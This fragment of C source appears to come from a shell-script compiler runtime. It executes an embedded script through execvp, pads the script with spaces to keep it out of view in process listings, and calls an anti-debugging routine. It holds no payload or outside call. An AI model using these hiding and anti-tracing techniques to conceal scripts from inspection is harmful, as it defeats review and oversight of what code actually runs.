		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
	varg[j++] = argv[0];		/* My own name at execution */
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if !defined(TRACEABLE)
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
